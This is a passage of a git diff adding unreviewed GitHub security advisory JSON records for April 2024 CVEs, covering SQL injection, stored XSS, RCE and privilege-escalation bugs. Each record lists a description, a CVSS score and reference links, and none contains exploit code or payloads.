"https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055384%40premium-addons-for-elementor&new=3055384%40premium-addons-for-elementor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/18b2d99a-f55c-4a05-8442-e1fddd59181f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6r8g-4hxg-92rf/GHSA-6r8g-4hxg-92rf.json b/advisories/unreviewed/2024/04/GHSA-6r8g-4hxg-92rf/GHSA-6r8g-4hxg-92rf.json new file mode 100644 index 00000000000..76f1049b3b6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6r8g-4hxg-92rf/GHSA-6r8g-4hxg-92rf.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6r8g-4hxg-92rf", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52542" + ], + "details": "Permission verification vulnerability in the system module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52542" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6vjq-3xr5-4jh8/GHSA-6vjq-3xr5-4jh8.json b/advisories/unreviewed/2024/04/GHSA-6vjq-3xr5-4jh8/GHSA-6vjq-3xr5-4jh8.json new file mode 100644 index 00000000000..d0afd7680fc --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6vjq-3xr5-4jh8/GHSA-6vjq-3xr5-4jh8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6vjq-3xr5-4jh8", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26194" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26194" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26194" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-347" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6w7h-hq54-gmmp/GHSA-6w7h-hq54-gmmp.json b/advisories/unreviewed/2024/04/GHSA-6w7h-hq54-gmmp/GHSA-6w7h-hq54-gmmp.json new file mode 100644 index 00000000000..9e535f6a231 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6w7h-hq54-gmmp/GHSA-6w7h-hq54-gmmp.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6w7h-hq54-gmmp", + "modified": "2024-04-07T06:30:30Z", + "published": "2024-04-07T06:30:30Z", + "aliases": [ + "CVE-2024-3417" + ], + "details": "A vulnerability, which was classified as critical, has been found in SourceCodester Online Courseware 1.0. This issue affects some unknown processing of the file admin/saveeditt.php. The manipulation of the argument contact leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259589 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3417" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-02.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259589" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259589" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311595" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T06:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6w9f-jx26-wxpp/GHSA-6w9f-jx26-wxpp.json b/advisories/unreviewed/2024/04/GHSA-6w9f-jx26-wxpp/GHSA-6w9f-jx26-wxpp.json new file mode 100644 index 00000000000..df497471d3a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-6w9f-jx26-wxpp/GHSA-6w9f-jx26-wxpp.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6w9f-jx26-wxpp", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-3353" + ], + "details": "A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0 and classified as critical. This issue affects some unknown processing of the file admin/mod_reports/index.php. The manipulation of the argument categ/end leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259457 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3353" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-06" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259457" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259457" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310221" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7245-x6gq-6qg5/GHSA-7245-x6gq-6qg5.json b/advisories/unreviewed/2024/04/GHSA-7245-x6gq-6qg5/GHSA-7245-x6gq-6qg5.json new file mode 100644 index 00000000000..a2d1810ba20 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7245-x6gq-6qg5/GHSA-7245-x6gq-6qg5.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7245-x6gq-6qg5", + "modified": "2024-04-08T06:31:30Z", + "published": "2024-04-08T06:31:30Z", + "aliases": [ + "CVE-2024-31022" + ], + "details": "An issue was discovered in CandyCMS version 1.0.0, allows remote attackers to execute arbitrary code via the install.php component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31022" + }, + { + "type": "WEB", + "url": "https://www.xuxblog.top/2024/03/25/CandyCMS-Pre-Auth-RCE" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T06:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7389-qfwh-c32p/GHSA-7389-qfwh-c32p.json b/advisories/unreviewed/2024/04/GHSA-7389-qfwh-c32p/GHSA-7389-qfwh-c32p.json new file mode 100644 index 00000000000..d83f2ba0c6d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7389-qfwh-c32p/GHSA-7389-qfwh-c32p.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7389-qfwh-c32p", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1790" + ], + "details": "The WordPress Infinite Scroll – Ajax Load More plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 7.0.1 via the 'type' parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. This is limited to Windows instances.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1790" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ajax-load-more/trunk/admin/functions/layouts.php#L14" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3056137/ajax-load-more/tags/7.1.0/admin/functions/layouts.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3056137/ajax-load-more/tags/7.1.0/core/functions.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/86090ab4-9f1d-4a92-a302-118524a5ffaa?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-73j4-6xvf-jv3h/GHSA-73j4-6xvf-jv3h.json b/advisories/unreviewed/2024/04/GHSA-73j4-6xvf-jv3h/GHSA-73j4-6xvf-jv3h.json new file mode 100644 index 00000000000..dff988a5200 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-73j4-6xvf-jv3h/GHSA-73j4-6xvf-jv3h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73j4-6xvf-jv3h", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29989" + ], + "details": "Azure Monitor Agent Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29989" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29989" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-73p8-jp88-9jjm/GHSA-73p8-jp88-9jjm.json b/advisories/unreviewed/2024/04/GHSA-73p8-jp88-9jjm/GHSA-73p8-jp88-9jjm.json new file mode 100644 index 00000000000..e41ca7956dd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-73p8-jp88-9jjm/GHSA-73p8-jp88-9jjm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73p8-jp88-9jjm", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26236" + ], + "details": "Windows Update Stack Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26236" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26236" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-591" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-73qm-xvq7-vqwg/GHSA-73qm-xvq7-vqwg.json b/advisories/unreviewed/2024/04/GHSA-73qm-xvq7-vqwg/GHSA-73qm-xvq7-vqwg.json new file mode 100644 index 00000000000..36b17963667 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-73qm-xvq7-vqwg/GHSA-73qm-xvq7-vqwg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73qm-xvq7-vqwg", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2023-1083" + ], + "details": "An unauthenticated remote attacker who is aware of a MQTT topic name can send and receive messages, including GET/SET configuration commands, reboot commands and firmware updates.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1083" + }, + { + "type": "WEB", + "url": "https://cert.vde.com/en/advisories/VDE-2024-009" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-74g7-xr56-998f/GHSA-74g7-xr56-998f.json b/advisories/unreviewed/2024/04/GHSA-74g7-xr56-998f/GHSA-74g7-xr56-998f.json new file mode 100644 index 00000000000..0f9fa26f84c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-74g7-xr56-998f/GHSA-74g7-xr56-998f.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74g7-xr56-998f", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2165" + ], + "details": "The SEOPress – On-site SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image alt parameter in all versions up to, and including, 7.5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2165" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3056025%40wp-seopress%2Ftrunk&old=3047913%40wp-seopress%2Ftrunk&sfp_email=&sfph_mail=#file14" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/46e66230-06d6-452e-a7aa-862b2bb8c27d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-74g9-h4xg-q2rv/GHSA-74g9-h4xg-q2rv.json b/advisories/unreviewed/2024/04/GHSA-74g9-h4xg-q2rv/GHSA-74g9-h4xg-q2rv.json new file mode 100644 index 00000000000..62e253293b3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-74g9-h4xg-q2rv/GHSA-74g9-h4xg-q2rv.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74g9-h4xg-q2rv", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-3356" + ], + "details": "A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file admin/mod_settings/controller.php?action=add. The manipulation of the argument type leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259460.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3356" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-10" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259460" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259460" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310225" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-75cq-q7qc-2mc2/GHSA-75cq-q7qc-2mc2.json b/advisories/unreviewed/2024/04/GHSA-75cq-q7qc-2mc2/GHSA-75cq-q7qc-2mc2.json new file mode 100644 index 00000000000..d38938a9d9d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-75cq-q7qc-2mc2/GHSA-75cq-q7qc-2mc2.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-75cq-q7qc-2mc2", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31809" + ], + "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the FileName parameter in the setUpgradeFW function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31809" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/CI_4_setUpgradeFW/CI.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-75rf-98vv-mhm4/GHSA-75rf-98vv-mhm4.json b/advisories/unreviewed/2024/04/GHSA-75rf-98vv-mhm4/GHSA-75rf-98vv-mhm4.json new file mode 100644 index 00000000000..2cd3a2f6457 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-75rf-98vv-mhm4/GHSA-75rf-98vv-mhm4.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-75rf-98vv-mhm4", + "modified": "2024-04-07T15:30:32Z", + "published": "2024-04-07T15:30:32Z", + "aliases": [ + "CVE-2024-3422" + ], + "details": "A vulnerability was found in SourceCodester Online Courseware 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/activatestud.php. The manipulation of the argument selector leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259594 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3422" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-07.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259594" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259594" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311600" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-75xg-g2r2-475p/GHSA-75xg-g2r2-475p.json b/advisories/unreviewed/2024/04/GHSA-75xg-g2r2-475p/GHSA-75xg-g2r2-475p.json new file mode 100644 index 00000000000..c1dd6b5709f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-75xg-g2r2-475p/GHSA-75xg-g2r2-475p.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-75xg-g2r2-475p", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2665" + ], + "details": "The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button in all versions up to, and including, 4.10.27 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2665" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3066988%40premium-addons-for-elementor&new=3066988%40premium-addons-for-elementor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cab56873-f79c-4fd2-8d40-ee4a338cbe8b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7678-c58q-5pw3/GHSA-7678-c58q-5pw3.json b/advisories/unreviewed/2024/04/GHSA-7678-c58q-5pw3/GHSA-7678-c58q-5pw3.json new file mode 100644 index 00000000000..cae9af27a04 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7678-c58q-5pw3/GHSA-7678-c58q-5pw3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7678-c58q-5pw3", + "modified": "2024-04-08T09:31:14Z", + "published": "2024-04-08T09:31:14Z", + "aliases": [ + "CVE-2024-31357" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BdThemes Ultimate Store Kit Elementor Addons allows Stored XSS.This issue affects Ultimate Store Kit Elementor Addons: from n/a through 1.5.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31357" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/ultimate-store-kit/wordpress-ultimate-store-kit-elementor-addons-plugin-1-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-772r-9j2c-4jvf/GHSA-772r-9j2c-4jvf.json b/advisories/unreviewed/2024/04/GHSA-772r-9j2c-4jvf/GHSA-772r-9j2c-4jvf.json new file mode 100644 index 00000000000..8772f345202 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-772r-9j2c-4jvf/GHSA-772r-9j2c-4jvf.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-772r-9j2c-4jvf", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29749" + ], + "details": "In tmu_set_tr_thresholds of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29749" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-775c-ww7w-2c2j/GHSA-775c-ww7w-2c2j.json b/advisories/unreviewed/2024/04/GHSA-775c-ww7w-2c2j/GHSA-775c-ww7w-2c2j.json new file mode 100644 index 00000000000..b5cd7c253b1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-775c-ww7w-2c2j/GHSA-775c-ww7w-2c2j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-775c-ww7w-2c2j", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29063" + ], + "details": "Azure AI Search Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29063" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29063" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-77wg-f3wm-v858/GHSA-77wg-f3wm-v858.json b/advisories/unreviewed/2024/04/GHSA-77wg-f3wm-v858/GHSA-77wg-f3wm-v858.json new file mode 100644 index 00000000000..0d53a3a20d8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-77wg-f3wm-v858/GHSA-77wg-f3wm-v858.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77wg-f3wm-v858", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-31367" + ], + "details": "Missing Authorization vulnerability in PenciDesign Soledad.This issue affects Soledad: from n/a through 8.4.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31367" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-2-authenticated-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-786j-qm2f-r49g/GHSA-786j-qm2f-r49g.json b/advisories/unreviewed/2024/04/GHSA-786j-qm2f-r49g/GHSA-786j-qm2f-r49g.json new file mode 100644 index 00000000000..d2df82eda90 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-786j-qm2f-r49g/GHSA-786j-qm2f-r49g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-786j-qm2f-r49g", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2335" + ], + "details": "The Elements Plus! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widget link URLs in all versions up to, and including, 2.16.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2335" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/elements-plus/tags/2.16.2&old=3051181&new_path=/elements-plus/tags/2.16.3&new=3051181&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9efb7dc8-d0a1-4707-a465-6a55b2d4a426?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-78c9-fpph-r266/GHSA-78c9-fpph-r266.json b/advisories/unreviewed/2024/04/GHSA-78c9-fpph-r266/GHSA-78c9-fpph-r266.json new file mode 100644 index 00000000000..d3707ced568 --- /dev/null +++ 